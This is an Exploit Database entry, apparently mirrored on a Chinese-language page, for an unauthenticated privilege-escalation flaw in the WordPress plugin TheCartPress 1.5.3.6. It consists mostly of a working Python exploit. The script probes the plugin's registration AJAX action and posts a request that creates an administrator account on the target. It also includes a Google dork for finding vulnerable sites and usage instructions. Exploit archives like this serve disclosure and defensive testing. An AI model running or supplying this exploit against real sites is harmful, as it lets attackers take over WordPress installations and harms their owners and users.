WordPress Plugin TheCartPress 1.5.3.6 – Privilege Escalation (Unauthenticated)

• Exploit Database
• 57 阅读

• 作者： spacehen
  日期： 2021-10-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50378/

• # Exploit Title: WordPress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)
  # Google Dork: inurl:/wp-content/plugins/thecartpress/
  # Date: 04/10/2021
  # Exploit Author: spacehen
  # Vendor Homepage: https://wordpress.org/plugin/thecartpress
  # Version: <= 1.5.3.6
  # Tested on: Ubuntu 20.04.1
  
  import os.path
  from os import path
  import json
  import requests;
  import sys
  
  def print_banner():
  	print("TheCartPress <= 1.5.3.6 - Unauthenticated Privilege Escalation")
  	print("Author -> space_hen (www.github.com/spacehen)")
  	
  def print_usage():
  	print("Usage: python3 exploit.py [target url]")
  	print("Ex: python3 exploit.py https://example.com")
  
  def vuln_check(uri):
  	response = requests.get(uri)
  	raw = response.text
  	if ("User name is required" in raw):
  		return True;
  	else:
  		return False;
  
  def main():
  
  	print_banner()
  	if(len(sys.argv) != 2):
  		print_usage();
  		sys.exit(1);
  
  	base = sys.argv[1]
  
  	ajax_action = 'tcp_register_and_login_ajax'
  	admin = '/wp-admin/admin-ajax.php';
  
  	uri = base + admin + '?action=' + ajax_action ;
  	check = vuln_check(uri);
  
  	if(check == False):
  		print("(*) Target not vulnerable!");
  		sys.exit(1)
  
  	data = {
  	"tcp_new_user_name" : "admin_02",
  	"tcp_new_user_pass" : "admin1234",
  	"tcp_repeat_user_pass" : "admin1234",
  	"tcp_new_user_email" : "test@test.com",
  	"tcp_role" : "administrator"
  	}
  	print("Inserting admin...");
  	response = requests.post(uri, data=data )
  	if (response.text == "\"\""):
  		print("Success!")
  		print("Now login at /wp-admin/")
  	else:
  		print(response.text)
  
  main();